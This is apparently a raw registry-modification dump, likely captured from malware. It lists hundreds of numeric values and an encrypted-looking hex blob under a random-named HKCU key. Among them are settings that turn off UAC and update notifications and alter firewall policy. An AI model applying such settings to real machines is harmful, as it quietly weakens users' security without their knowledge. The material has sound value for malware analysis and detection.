[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKCU\Software\Stvncyfrlda]
"m2_581" = "3181572278"
"m2_580" = "1446275082"
"m2_583" = "2357191921"
"m2_582" = "621891546"
"m2_585" = "1532801327"
"m2_584" = "4092473246"
"m2_587" = "708406808"
"m2_586" = "3268088366"
"m2_589" = "4178986973"
"m2_588" = "2443704018"
"m1_168" = "2508033078"
"m1_169" = "1364320184"
"m2_477" = "3099952167"
"m2_476" = "1364669932"
"m2_471" = "1278154419"
"m2_470" = "3837822241"
"m2_473" = "453767657"
"m2_472" = "3013438092"
"m1_160" = "1392554902"
"m1_161" = "1964895812"
"m1_162" = "2731405735"
"m1_163" = "2574901212"
"m1_164" = "137714799"
"m1_165" = "1936220912"
"m1_166" = "476672531"
"m1_167" = "4141290893"
"m1_368" = "1111723201"
"m1_369" = "1450958252"
"m1_362" = "2877716632"
"m1_363" = "1524324857"
"m1_360" = "24689657"
"m1_361" = "4271466763"
"m1_366" = "4109813607"
"m1_367" = "1329282301"
"m1_364" = "775489076"
"m1_365" = "3507934164"
"m1_641" = "3370962851"
"m1_640" = "3465281193"
"m1_643" = "2045902750"
"m1_642" = "3397944097"
"m1_645" = "1424123339"
"m1_644" = "2745704733"
"m3_364" = "268764373"
"m3_365" = "2037888064"
"m3_366" = "3739232255"
"m3_367" = "1179834218"
"m3_360" = "1917836129"
"m3_361" = "3686288028"
"m3_362" = "1126889995"
"m3_363" = "2828309926"
"m1_388" = "1099563529"
"m1_389" = "4066063279"
"m3_368" = "2948810393"
"m3_369" = "388888116"
"m4_424" = "1323863176"
"m4_425" = "3059153909"
"m4_426" = "499477346"
"m4_427" = "2234768079"
"m4_420" = "2972634836"
"m4_421" = "412958273"
"m4_422" = "2148249006"
"m4_423" = "3883539739"
"m3_562" = "292812643"
"m4_323" = "2153158279"
"m3_560" = "1083233369"
"m3_561" = "2818656244"
"m4_428" = "3970058812"
"m4_429" = "1410382249"
"m3_564" = "3729659405"
"m3_565" = "1203274168"
"m1_55" = "3935690198"
"m1_54" = "2676628899"
"m1_57" = "313905025"
"m1_56" = "3099755236"
"m1_51" = "2495051713"
"m1_50" = "3166191927"
"m1_53" = "1170818336"
"m1_52" = "2674574330"
"m1_59" = "2574047048"
"m1_58" = "155894208"
"m3_108" = "2744413141"
"m3_109" = "184949568"
"m3_104" = "98446945"
"m3_105" = "1833490844"
"m3_106" = "3535358219"
"m3_107" = "975960230"
"m3_100" = "1713433789"
"m3_101" = "3482491944"
"m3_102" = "922947399"
"m3_103" = "2624438002"
"m3_580" = "1463228637"
"m3_581" = "3164702792"
"m3_582" = "605174759"
"m3_583" = "2373757714"
"m3_584" = "4075641473"
"m3_585" = "1516227132"
"m3_586" = "3284690347"
"m3_587" = "725226694"
"m3_588" = "2426700917"
"m3_589" = "4162140128"
"m3_610" = "1948707731"
"m3_611" = "3717241614"
"m3_612" = "1157696189"
"m3_613" = "2859711016"
"m4_558" = "1924587414"
"m4_559" = "3659878147"
"m3_616" = "3770643553"
"m3_617" = "1210705820"
"m4_554" = "3573359074"
"m4_555" = "1013682511"
"m4_556" = "2748973244"
"m4_557" = "189296681"
"m4_550" = "927163438"
"m4_551" = "2662454171"
"m4_552" = "102777608"
"m4_553" = "1838068341"
"m2_279" = "3109781327"
"m2_278" = "1374491578"
"m2_277" = "3934161554"
"m2_276" = "2198878888"
"m2_275" = "463578928"
"m2_274" = "3023261778"
"m2_273" = "1287965454"
"m2_272" = "3847647300"
"m2_271" = "2112348553"
"m2_270" = "377068029"
"m3_421" = "429806696"
"m1_564" = "710644573"
"m1_565" = "3545351395"
"m1_566" = "3040588863"
"m1_567" = "2274087386"
"m1_560" = "1913290773"
"m1_561" = "1121966040"
"m1_562" = "253918830"
"m1_563" = "3246653874"
"m1_568" = "3686142307"
"m1_569" = "737289369"
"m3_238" = "698940799"
"m2_118" = "2900836996"
"m3_239" = "2434362602"
"m2_112" = "1079026937"
"m2_113" = "2814327881"
"m2_110" = "1903425009"
"m2_111" = "3638707759"
"m2_116" = "3725225172"
"m2_117" = "1165557190"
"m2_114" = "254641412"
"m2_115" = "1989942153"
"m3_234" = "2347938699"
"m3_614" = "333206855"
"m3_235" = "4083360550"
"m3_615" = "2068759794"
"m3_618" = "2979763979"
"m3_619" = "419694246"
"m2_488" = "713325995"
"m2_489" = "2448605561"
"m1_179" = "3529145340"
"m1_178" = "696058340"
"m1_173" = "2714206487"
"m1_172" = "445726376"
"m1_171" = "1144272753"
"m1_170" = "88725579"
"m1_177" = "186457854"
"m1_176" = "2974283584"
"m1_175" = "1755581866"
"m1_174" = "789665096"
"m2_644" = "835738163"
"m2_645" = "2571021845"
"m2_642" = "1660122199"
"m2_643" = "3395405346"
"m2_640" = "2484503348"
"m2_641" = "4219791633"
"m1_9" = "832982715"
"m4_218" = "336257746"
"m1_379" = "354617132"
"m1_378" = "2402579785"
"m1_375" = "394139158"
"m1_8" = "1352418389"
"m1_377" = "135934779"
"m1_376" = "2962213199"
"m1_371" = "3248475716"
"m1_370" = "1294028848"
"m1_373" = "3531100441"
"m1_372" = "4010011809"
"m4_566" = "2922011390"
"m3_377" = "1352760748"
"m3_376" = "3945841201"
"m3_375" = "2210812546"
"m3_374" = "441819927"
"m3_373" = "3001758712"
"m3_372" = "1299873869"
"m3_371" = "3825733854"
"m3_370" = "2090754467"
"m1_399" = "3428221841"
"m1_398" = "3643926719"
"m3_379" = "561880182"
"m3_378" = "3088313563"
"m4_437" = "2407806225"
"m4_436" = "672515492"
"m4_435" = "3232192055"
"m4_434" = "1496901322"
"m4_433" = "4056577885"
"m4_432" = "2321287152"
"m4_431" = "585996419"
"m4_430" = "3145672982"
"m3_575" = "1343172602"
"m3_574" = "3902717007"
"m3_577" = "518672004"
"m3_576" = "3111772009"
"m3_571" = "2991710774"
"m3_570" = "1256682139"
"m4_439" = "1583420395"
"m4_438" = "4143096958"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 6B 24 65 D1 CD CB 03 3B 65 E4 A1 CC 33 5D E7"
[HKCU\Software\Stvncyfrlda]
"m1_43" = "1636765073"
"m1_40" = "1800662581"
"m1_41" = "3581849624"
"m1_46" = "2416262492"
"m1_47" = "3665907900"
"m1_44" = "3046463879"
"m1_45" = "2287517440"
"m1_48" = "647774394"
"m1_49" = "1250197525"
"m3_119" = "357998978"
"m3_118" = "2917414423"
"m3_117" = "1148946168"
"m3_116" = "3741914957"
"m3_115" = "2006935518"
"m3_114" = "237958307"
"m3_113" = "2797356340"
"m3_112" = "1096013209"
"m3_111" = "3655416426"
"m3_110" = "1886423807"
"m3_593" = "2547216724"
"m3_592" = "778225209"
"m3_591" = "3337639562"
"m3_590" = "1636280095"
"m3_597" = "898282264"
"m3_596" = "3424125933"
"m3_595" = "1689227390"
"m3_594" = "4282245315"
"m2_95" = "1643859347"
"m3_598" = "2600149687"
"m3_603" = "2686656406"
"m3_602" = "951151739"
"m3_601" = "3544251596"
"m3_600" = "1809206609"
"m3_607" = "1071208794"
"m3_606" = "3597184559"
"m4_549" = "3486840001"
"m4_548" = "1751549268"
"m4_547" = "16258535"
"m4_546" = "2575935098"
"m4_545" = "840644365"
"m4_544" = "3400320928"
"m4_543" = "1665030195"
"m4_542" = "4224706758"
"m4_541" = "2489416025"
"m4_540" = "754125292"
"m1_576" = "2804084271"
"m1_575" = "1914452412"
"m1_574" = "3780115158"
"m1_573" = "4242285277"
"m1_572" = "4057107519"
"m1_571" = "1118878145"
"m1_570" = "3215527363"
"m1_579" = "2142988111"
"m1_578" = "1161026925"
"m2_242" = "3328528372"
"m2_243" = "768859562"
"m2_89" = "4117012523"
"m2_241" = "1593244455"
"m2_246" = "1679755267"
"m2_247" = "3415055505"
"m2_244" = "2504135352"
"m2_245" = "4239438345"
"m2_83" = "2295216153"
"m2_82" = "559919028"
"m2_248" = "855371036"
"m2_249" = "2590668673"
"m2_87" = "646431848"
"m2_86" = "3206115521"
"m2_85" = "1470816764"
"m2_84" = "4030502268"
"m2_109" = "168124549"
"m2_108" = "2727810512"
"m2_105" = "1816895758"
"m2_104" = "81615226"
"m2_107" = "992510783"
"m2_106" = "3552197098"
"m2_101" = "3465668244"
"m2_100" = "1730387040"
"m2_103" = "2641282191"
"m2_102" = "906002189"
"m3_423" = "3866720050"
"m3_422" = "2164836231"
"m3_393" = "3381290108"
"m3_420" = "2955781373"
"m3_427" = "2217783526"
"m3_426" = "482738507"
"m3_425" = "3075838428"
"m3_424" = "1340860065"
"m2_8" = "997417692"
"m2_9" = "2732718958"
"m2_2" = "3470574940"
"m2_3" = "910907643"
"m2_0" = "1473"
"m2_1" = "1735291469"
"m2_6" = "1821803618"
"m2_7" = "3557101875"
"m2_4" = "2646188728"
"m2_5" = "86522069"
"m2_499" = "2621645891"
"m2_498" = "886363260"
"m1_148" = "2939780045"
"m1_149" = "139302232"
"m1_146" = "2264359775"
"m1_147" = "856660205"
"m1_144" = "916503661"
"m1_145" = "1506304235"
"m1_142" = "3516981039"
"m1_143" = "175604278"
"m1_140" = "239497170"
"m1_141" = "3180159092"
"m1_158" = "37238671"
"m2_119" = "341170931"
"m4_220" = "3806839212"
"m3_348" = "2602308101"
"m4_221" = "1247162649"
[HKCU\Software\Stvncyfrlda\168128873]
"910904903" = "0"
[HKCU\Software\Stvncyfrlda]
"m3_342" = "747352503"
"m3_343" = "2515804450"
"m3_340" = "1604884205"
"m3_341" = "3340305944"
"m3_346" = "3393319803"
"m3_347" = "867328662"
"m3_344" = "4251373649"
"m3_345" = "1658274764"
"m4_158" = "3592996166"
"m4_159" = "1033319603"
"m4_408" = "3623982520"
"m4_409" = "1064305957"
"m4_150" = "2595572190"
"m4_151" = "35895627"
"m4_152" = "1771186360"
"m4_153" = "3506477093"
"m4_154" = "946800530"
"m4_155" = "2682091263"
"m4_156" = "122414700"
"m4_157" = "1857705433"
"m3_298" = "1737416395"
"m3_299" = "3439283814"
"m3_294" = "3385892103"
"m3_295" = "826346674"
"m3_296" = "2528361505"
"m3_297" = "4263259996"
"m3_290" = "706302803"
"m4_228" = "509295892"
"m3_292" = "4176769661"
"m3_293" = "1617358312"
"m4_229" = "2244586625"
"m4_398" = "3450944374"
"m4_399" = "891267811"
"m4_392" = "1629134568"
"m4_393" = "3364425301"
"m4_390" = "2453520398"
"m4_391" = "4188811131"
"m4_396" = "4275330204"
"m4_397" = "1715653641"
"m4_394" = "804748738"
"m4_395" = "2540039471"
"m3_122" = "1268937691"
"m3_123" = "3003966326"
"m3_120" = "2059882801"
"m3_121" = "3794911404"
"m3_126" = "3914972559"
"m3_127" = "1321872698"
"m3_124" = "410948325"
"m3_125" = "2179924496"
"m3_128" = "3056917673"
"m3_129" = "530927556"
"m1_99" = "812878970"
"m1_98" = "1914991464"
"m1_91" = "2580841924"
"m1_90" = "290848589"
"m1_93" = "636337100"
"m1_92" = "4168627776"
"m1_95" = "1053875242"
"m1_94" = "3640753757"
"m1_97" = "108094070"
"m1_96" = "1380985173"
"m4_613" = "2876297217"
"m4_612" = "1141006484"
"m4_611" = "3700683047"
"m4_572" = "448853900"
"m4_573" = "2184144633"
"m4_570" = "1273239730"
"m4_571" = "3008530463"
"m4_576" = "3095049536"
"m4_577" = "535372973"
"m4_574" = "3919435366"
"m4_575" = "1359758803"
"m4_617" = "1227525557"
"m4_578" = "2270663706"
"m4_579" = "4005954439"
"m4_616" = "3787202120"
"m4_370" = "2107444106"
"m4_371" = "3842734839"
"m4_372" = "1283058276"
"m4_373" = "3018349009"
"m4_374" = "458672446"
"m4_375" = "2193963179"
"m4_376" = "3929253912"
"m4_377" = "1369577349"
"m4_378" = "3104868082"
"m4_379" = "545191519"
"m4_614" = "316620654"
"m3_638" = "3292191631"
"m3_639" = "766200634"
"m3_93" = "2451378352"
"m3_92" = "716398853"
"m3_91" = "3309498774"
"m3_90" = "1573930619"
"m3_97" = "836457060"
"m3_96" = "3362431689"
"m3_95" = "1626878810"
"m3_94" = "4220485679"
"m3_99" = "4273372430"
"m3_98" = "2571488659"
"m1_548" = "939456537"
"m1_549" = "26179220"
"m1_542" = "2287745909"
"m1_543" = "3825126746"
"m1_540" = "110937577"
"m1_541" = "911201880"
"m1_546" = "3273943748"
"m1_547" = "2774072669"
"m1_544" = "17493787"
"m1_545" = "2775816460"
"m2_98" = "2554770932"
"m2_99" = "4290052608"
"m2_257" = "3588080817"
"m2_256" = "1852786890"
"m2_251" = "1766271947"
"m2_250" = "30984190"
"m2_253" = "941886733"
"m2_252" = "3501571376"
"m2_90" = "1557345541"
"m2_91" = "3292642237"
"m2_92" = "732962524"
"m2_93" = "2468244945"
"m2_94" = "4203532236"
"m2_258" = "1028412723"
"m2_96" = "3379158833"
"m2_97" = "819470932"
"m1_498" = "3704560951"
"m1_499" = "4149926322"
"m1_494" = "3828538342"
"m1_495" = "51912971"
"m1_496" = "109688970"
"m1_497" = "3321271276"
"m1_490" = "666591371"
"m1_491" = "3086512734"
"m1_492" = "1639830720"
"m1_493" = "571998036"
"m3_265" = "273825276"
"m3_264" = "2833351233"
[HKCU\Software\Stvncyfrlda\168128873]
"-1648771660" = "30"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Stvncyfrlda]
"m2_628" = "3135849336"
"m2_629" = "576178231"
"m2_624" = "489655802"
"m2_625" = "2224954553"
"m2_626" = "3960237034"
"m2_627" = "1400566781"
"m2_620" = "2138423460"
"m2_621" = "3873722590"
"m2_622" = "1314041714"
"m2_623" = "3049339383"
"m2_325" = "1328770236"
"m2_324" = "3888451744"
"m4_416" = "326439200"
"m2_327" = "504381960"
"m1_151" = "1325341917"
"m1_150" = "3187434083"
"m1_153" = "1663284376"
"m1_152" = "1268272663"
"m1_155" = "142821956"
"m1_154" = "3398792655"
"m1_157" = "567493224"
"m1_156" = "4186830039"
"m1_159" = "288317709"
"m2_321" = "2977538713"
"m2_320" = "1242259327"
"m2_326" = "3064068564"
"m2_323" = "2153154493"
"m2_322" = "417869930"
"m2_530" = "581087733"
"m2_531" = "2316371255"
"m2_532" = "4051665872"
"m2_533" = "1491986677"
"m2_534" = "3227284956"
"m2_535" = "667599383"
"m2_536" = "2402901246"
"m2_537" = "4138184322"
"m2_538" = "1578512630"
"m2_539" = "3313799000"
"m2_329" = "3974967073"
"m2_328" = "2239683830"
"m4_415" = "2886115763"
"m4_414" = "1150825030"
"m4_417" = "2061729933"
"m4_413" = "3710501593"
"m4_411" = "239920127"
"m4_410" = "2799596690"
"m3_359" = "182266866"
"m3_358" = "2775365703"
"m3_355" = "1864887822"
"m3_354" = "129334931"
"m3_357" = "1006766376"
"m3_356" = "3566311869"
"m3_351" = "3513363546"
"m3_350" = "1778335023"
"m3_353" = "2655309668"
"m3_352" = "920281033"
"m4_412" = "1975210860"
"m4_149" = "860281457"
"m4_148" = "3419958020"
"m4_419" = "1237344103"
"m4_418" = "3797020666"
"m4_143" = "3333438947"
"m4_142" = "1598148214"
"m4_141" = "4157824777"
"m4_140" = "2422534044"
"m4_147" = "1684667287"
"m4_146" = "4244343850"
"m4_145" = "2509053117"
"m4_144" = "773762384"
"m3_289" = "3265830948"
"m3_288" = "1564356745"
"m3_287" = "4123885850"
"m3_286" = "2355302895"
"m3_285" = "619800176"
"m3_284" = "3212900037"
"m3_283" = "1444300630"
"m3_282" = "4003845179"
"m3_281" = "2302354572"
"m3_280" = "566932753"
"m4_389" = "718229665"
"m4_388" = "3277906228"
"m4_385" = "2367001325"
"m4_384" = "631710592"
"m4_387" = "1542615495"
"m4_386" = "4102292058"
"m4_381" = "4015772985"
"m4_380" = "2280482252"
"m4_383" = "3191387155"
"m4_382" = "1456096422"
"m3_135" = "2319427666"
"m3_134" = "583874855"
"m3_137" = "1528482684"
"m3_136" = "4087897025"
"m4_89" = "4117019877"
"m3_130" = "2266496883"
"m3_133" = "3176958344"
"m3_132" = "1441930781"
"m4_85" = "1470824241"
"m4_84" = "4030500804"
"m4_87" = "646438411"
"m4_86" = "3206114974"
"m4_81" = "3119595901"
"m4_80" = "1384305168"
"m4_83" = "2295210071"
"m4_82" = "559919338"
"m3_406" = "136830199"
"m1_86" = "4045988655"
"m1_87" = "4229359945"
"m1_84" = "3386952941"
"m1_85" = "253297037"
"m1_82" = "3603247670"
"m1_83" = "381831176"
"m1_80" = "2313298852"
"m1_81" = "1395451115"
"m1_88" = "2069503785"
"m1_89" = "3618336951"
"m2_394" = "804743073"
"m2_395" = "2540043271"
"m2_396" = "4275337558"
"m2_397" = "1715658541"
"m2_390" = "2453527149"
"m2_391" = "4188813916"
"m2_392" = "1629130125"
"m2_393" = "3364428641"
"m2_398" = "3450939582"
"m2_399" = "891273054"
"m4_363" = "2845310863"
"m4_362" = "1110020130"
"m4_361" = "3669696693"
"m4_360" = "1934405960"
"m4_367" = "1196539203"
"m4_366" = "3756215766"
"m4_365" = "2020925033"
"m4_364" = "285634300"
"m3_621" = "3890684224"
"m3_620" = "2121707989"
"m4_369" = "372153373"
"m4_368" = "2931829936"
"m3_625" = "2241684276"
"m3_624" = "472707993"
"m3_627" = "1383697886"
"m3_626" = "3977188003"
"m4_535" = "667606219"
"m3_80" = "1401010233"
"m3_81" = "3102878548"
"m3_82" = "542956227"
"m3_83" = "2311932542"
"m3_84" = "4047496685"
"m3_85" = "1453954328"
"m3_86" = "3189376183"
"m3_87" = "663008290"
"m3_88" = "2364876625"
"m3_89" = "4100445900"
"m4_532" = "4051668612"
"m1_559" = "3978953328"
"m1_558" = "4072223264"
"m1_555" = "4200732729"
"m1_554" = "3789096793"
"m1_557" = "3295762267"
"m1_556" = "2299586968"
"m1_551" = "2784800551"
"m1_550" = "555694484"
"m1_553" = "1454853723"
"m1_552" = "2194839474"
"m4_533" = "1491992049"
"m1_489" = "3570516276"
"m1_488" = "1403113297"
"m1_487" = "3346432269"
"m1_486" = "2074538868"
"m1_485" = "3267081088"
"m1_484" = "3016621788"
"m1_483" = "642060510"
"m1_482" = "1743370092"
"m1_481" = "3739900742"
"m1_480" = "2458092105"
"m2_49" = "3424864112"
"m2_48" = "1689582282"
"m2_47" = "4249250745"
"m2_46" = "2513966934"
"m2_45" = "778679267"
"m2_44" = "3338373516"
"m2_43" = "1603052302"
"m2_42" = "4162736735"
"m2_41" = "2427437681"
"m2_40" = "692157962"
"m2_480" = "4010867280"
"m2_481" = "1451181533"
"m4_531" = "2316377879"
"m2_482" = "3186480022"
"m2_483" = "626791337"
"m2_484" = "2362097424"
"m2_485" = "4097377185"
"m2_486" = "1537708438"
"m3_131" = "3967839982"
"m2_487" = "3272991084"
"m4_88" = "2381729144"
"m3_446" = "862287311"
"m3_139" = "703982086"
"m3_138" = "3230366443"
"m3_526" = "2246810591"
"m2_639" = "749220023"
"m3_527" = "3981708106"
"m2_637" = "1573607514"
"m2_636" = "4133274171"
"m2_635" = "2397993297"
"m2_634" = "662692472"
"m2_633" = "3222379835"
"m3_524" = "3071244597"
"m2_631" = "4046763743"
"m2_630" = "2311465312"
"m3_525" = "477751456"
"m3_522" = "3861667435"
"m3_523" = "1335806342"
"m1_124" = "203106326"
"m1_125" = "3004234304"
"m1_126" = "2311457947"
"m1_127" = "3785676248"
"m1_120" = "594001362"
"m1_121" = "3197185103"
"m1_122" = "1666921387"
"m1_123" = "1756605446"
"m3_521" = "2126753532"
"m1_128" = "3402904906"
"m1_129" = "185828756"
"m1_238" = "1696225512"
"m1_239" = "3744932980"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"
[HKCU\Software\Stvncyfrlda]
"m1_230" = "3450366165"
"m1_231" = "612815395"
"m1_232" = "164671606"
"m1_233" = "1075688701"
"m1_234" = "3195094288"
"m1_235" = "263160699"
"m1_236" = "4169523029"
"m1_237" = "1639314678"
"m2_523" = "1318957679"
"m2_522" = "3878627783"
"m2_521" = "2143345547"
"m2_520" = "408046236"
"m2_527" = "3965156147"
"m2_526" = "2229855860"
"m2_525" = "494574420"
"m2_524" = "3054252571"
"m2_529" = "3140771001"
"m2_528" = "1405469334"
"m4_620" = "2138430460"
"m1_374" = "295867397"
"m4_178" = "3939072458"
"m4_179" = "1379395895"
"m4_176" = "468490992"
"m4_177" = "2203781725"
"m4_174" = "1292876822"
"m4_175" = "3028167555"
"m4_172" = "2117262652"
"m4_173" = "3852553385"
"m4_170" = "2941648482"
"m4_171" = "381971919"
"m1_309" = "4119211866"
"m3_579" = "4022692270"
"m1_612" = "646929551"
"m4_98" = "2554767290"
"m4_99" = "4290058023"
"m3_440" = "3301763441"
"m1_613" = "2942020722"
"m4_92" = "732957484"
"m4_93" = "2468248217"
"m4_90" = "1557343314"
"m4_91" = "3292634047"
"m4_96" = "3379153120"
"m4_97" = "819476557"
"m4_94" = "4203538950"
"m4_95" = "1643862387"
"m3_386" = "4119292019"
"m3_387" = "1525750766"
"m3_384" = "614746537"
"m3_385" = "2350315716"
"m3_382" = "1472802447"
"m3_383" = "3208371770"
"m3_380" = "2263748581"
"m3_381" = "3998793488"
"m3_430" = "3128705855"
"m3_431" = "602862250"
"m3_432" = "2338287065"
"m3_433" = "4039712116"
"m3_434" = "1480297699"
"m3_435" = "3248765982"
"m3_388" = "3261303581"
"m3_389" = "734804616"
"m4_565" = "1186720657"
"m1_614" = "4141347866"
"m4_621" = "3873721193"
"m4_564" = "3746397220"
"m1_615" = "776473962"
"m4_567" = "362334827"
"m4_284" = "3196296428"
"m4_285" = "636619865"
"m4_286" = "2371910598"
"m4_287" = "4107201331"
"m4_280" = "550100792"
"m4_281" = "2285391525"
"m4_282" = "4020682258"
"m4_283" = "1461005695"
"m4_561" = "2835492317"
"m4_288" = "1547524768"
"m4_289" = "3282815501"
"m4_560" = "1100201584"
"m2_387" = "1542613160"
"m2_386" = "4102297469"
"m2_385" = "2366997857"
"m2_384" = "631716580"
"m2_383" = "3191385514"
"m2_382" = "1456102796"
"m2_381" = "4015770229"
"m2_380" = "2280472582"
"m4_590" = "1619316022"
"m4_591" = "3354606755"
"m4_592" = "794930192"
"m4_562" = "275815754"
"m4_594" = "4265511658"
"m4_595" = "1705835095"
"m2_389" = "718226822"
"m2_388" = "3277911874"
"m4_356" = "3583177620"
"m4_357" = "1023501057"
"m4_354" = "112596154"
"m4_355" = "1847886887"
"m4_352" = "936981984"
"m4_353" = "2672272717"
"m4_350" = "1761367814"
"m4_351" = "3496658547"
"m4_600" = "1792354168"
"m4_601" = "3527644901"
"m4_602" = "967968338"
"m4_603" = "2703259071"
"m4_604" = "143582508"
"m4_605" = "1878873241"
"m4_358" = "2758791790"
"m4_359" = "199115227"
"m4_569" = "3832916293"
"m4_568" = "2097625560"
"m3_629" = "592751864"
"m3_628" = "3152690509"
"m4_500" = "61972708"
"m3_144" = "790480761"
"m4_644" = "835735092"
"m3_145" = "2492364436"
"m4_507" = "3619073247"
"m3_148" = "3403350317"
"m2_58" = "1862608999"
"m2_59" = "3597909484"
"m3_149" = "843427928"
"m2_54" = "3511390630"
"m2_55" = "951707625"
"m2_56" = "2686993502"
"m2_57" = "127325069"
"m2_50" = "865162955"
"m2_51" = "2600480044"
"m2_52" = "40811196"
"m2_53" = "1776103827"
"m3_622" = "1330761983"
"m1_586" = "3662868790"
"m1_587" = "3166381696"
"m1_584" = "790125077"
"m1_585" = "1174731642"
"m1_582" = "3679404223"
"m1_583" = "3515541065"
"m1_580" = "2013952389"
"m1_581" = "4086399855"
"m1_588" = "3537716317"
"m1_589" = "385062066"
"m2_602" = "967971413"
"m2_603" = "2703249525"
"m2_600" = "1792357061"
"m2_601" = "3527642364"
"m2_606" = "3614170355"
"m2_607" = "1054482519"
"m2_604" = "143587565"
"m2_605" = "1878882045"
"m2_608" = "2789770172"
"m2_609" = "230098121"
"m4_508" = "1059396684"
"m1_137" = "2925469520"
"m1_136" = "529075234"
"m1_135" = "3136794341"
"m1_134" = "3454824132"
"m1_133" = "4117805262"
"m1_132" = "853112896"
"m1_131" = "2292910259"
"m1_130" = "287651104"
"m1_139" = "3389941883"
"m1_138" = "766127368"
"m1_229" = "388674838"
"m1_228" = "731996270"
"m1_223" = "1342173340"
"m1_222" = "1167649119"
"m1_221" = "1224768423"
"m1_220" = "1114899676"
"m1_227" = "684175828"
"m1_226" = "1295469387"
"m1_225" = "534586739"
"m1_224" = "4113760813"
"m2_516" = "2056817927"
"m2_517" = "3792115181"
"m2_514" = "2881203317"
"m1_417" = "3788704251"
"m2_512" = "3705588812"
"m2_513" = "1145921109"
"m2_510" = "235006929"
"m2_511" = "1970303216"
"m2_518" = "1232433130"
"m2_519" = "2967728625"
"m1_393" = "3693781588"
"m1_318" = "1426497244"
"m1_392" = "3483203931"
"m1_391" = "3438831557"
"m1_390" = "2538772522"
"m1_397" = "1421805945"
"m1_396" = "2720319456"
[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"
[HKCU\Software\Stvncyfrlda]
"m1_395" = "1433839762"
"m2_614" = "316615986"
"m1_394" = "3383088820"
"m4_512" = "3705592320"
"m4_513" = "1145915757"
"m4_161" = "208933773"
"m4_160" = "2768610336"
"m4_163" = "3679515239"
"m4_162" = "1944224506"
"m4_165" = "2855129409"
"m4_164" = "1119838676"
"m4_167" = "2030743579"
"m4_166" = "295452846"
"m4_169" = "1206357749"
"m4_168" = "3766034312"
"m3_578" = "2253717043"
"m4_67" = "300362119"
"m4_66" = "2860038682"
"m4_65" = "1124747949"
"m4_64" = "3684424512"
"m4_63" = "1949133779"
"m4_62" = "213843046"
"m4_61" = "2773519609"
"m4_60" = "1038228876"
"m4_69" = "3770943585"
"m4_68" = "2035652852"
"m3_399" = "874299594"
"m3_398" = "3434238303"
"m3_429" = "1427362688"
"m3_428" = "3986759701"
"m3_391" = "4172236114"
"m3_390" = "2470357543"
"m1_313" = "3707292982"
"m3_392" = "1612313793"
"m3_395" = "2523301638"
"m3_394" = "787748843"
"m3_397" = "1732355616"
"m3_396" = "4292294325"
"m4_297" = "4280239477"
"m4_296" = "2544948744"
"m4_295" = "809658011"
"m4_294" = "3369334574"
"m4_293" = "1634043841"
"m4_292" = "4193720404"
"m4_291" = "2458429671"
"m4_290" = "723138938"
"m2_491" = "1624220039"
"m1_624" = "1420319941"
"m3_572" = "465804709"
"m4_299" = "3455853647"
"m4_298" = "1720562914"
"m4_589" = "4178992585"
"m4_588" = "2443701852"
"m4_583" = "2357182779"
"m4_582" = "621892046"
"m4_581" = "3181568609"
"m4_580" = "1446277876"
"m4_587" = "708411119"
"m4_586" = "3268087682"
"m4_585" = "1532796949"
"m4_584" = "4092473512"
"m4_349" = "26077081"
"m4_348" = "2585753644"
"m4_619" = "403139727"
"m4_618" = "2962816290"
"m4_341" = "3323620401"
"m4_340" = "1588329668"
"m4_343" = "2499234571"
"m4_342" = "763943838"
"m4_345" = "1674848741"
"m4_344" = "4234525304"
"m4_347" = "850462911"
"m4_346" = "3410139474"
[HKCU\Software\Stvncyfrlda\168128873]
"-737866757" = "4B278A835FE92988F90F7C3CA41943E954C2A3E5F485BE927C19BB1BE3A4606DACD30115F9A5DFCC9A54A9CBC970B3F5552946D7DCA330D47DB444FE33A74E4F3934F853C78E0DC6D9EEE227165CFE1E5F4DF951B4E949E9FD58BC2F492F3A5FE47491DA52289271F36B555070B2FE3D61BD99AA79CD32B302250EFC3B19E5BA5983117001ACB3CC3315F4E8A6E14E431831F637A045E8B2E9D85E4FE4BB17441E184C36D2CE87AFD142CC126B0B44025A35802EFB7597B96B29F209B5C200ABEF3AD8D9E89ED2BD716737EA3531C319A48A0859A5D987B1F40AD720852CD4BAEEFF0335C753F5B39E9B397C689313439635D8144E674989A2B7C1E13F1E2F2E"
[HKCU\Software\Stvncyfrlda]
"m2_288" = "1547520324"
"m2_289" = "3282817977"
"m2_286" = "2371907006"
"m2_287" = "4107205643"
"m2_284" = "3196293037"
"m2_285" = "636621842"
"m2_282" = "4020674478"
"m2_283" = "1461007522"
"m2_280" = "550108768"
"m2_281" = "2285394493"
"m2_350" = "1761362540"
"m2_351" = "3496661792"
"m2_352" = "936980312"
"m2_353" = "2672279041"
"m2_354" = "112593996"
"m2_355" = "1847891654"
"m2_356" = "3583174365"
"m2_357" = "1023506497"
"m2_358" = "2758789486"
"m2_359" = "199121296"
"m2_69" = "3770951987"
"m2_68" = "2035648009"
"m3_645" = "2554189704"
"m2_61" = "2773503985"
"m2_60" = "1038237070"
"m2_63" = "1949136233"
"m2_62" = "213839611"
"m2_65" = "1124750533"
"m2_64" = "3684418167"
"m2_67" = "300366342"
"m2_66" = "2860032896"
"m3_644" = "819143709"
"m1_599" = "2740540207"
"m1_598" = "1823302124"
"m1_591" = "1372441050"
"m1_590" = "3879425375"
"m1_593" = "773482784"
"m1_592" = "216755556"
"m1_595" = "4077375202"
"m1_594" = "3669941686"
"m1_597" = "3491969292"
"m1_596" = "478776739"
"m1_37" = "3018188319"
"m1_36" = "3422610727"
"m1_35" = "3083015352"
"m1_34" = "739160523"
"m1_33" = "2702514902"
"m1_32" = "1180980499"
"m2_462" = "2840398294"
"m1_31" = "4269582479"
"m2_463" = "280730191"
"m1_30" = "3808679026"
"m2_460" = "3664781610"
"m2_461" = "1105113407"
"m2_466" = "1191626638"
"m2_467" = "2926925667"
"m2_464" = "2016011316"
"m4_536" = "2402896952"
"m3_640" = "2501245609"
"m2_465" = "3751309649"
"m4_518" = "1232434830"
"m2_615" = "2051912069"
"m1_42" = "1789610529"
"m2_617" = "1227529571"
"m2_616" = "3787197007"
"m2_611" = "3700681323"
"m2_610" = "1965396988"
"m2_613" = "2876296142"
"m2_612" = "1141011759"
"m2_619" = "403141655"
"m2_618" = "2962808838"
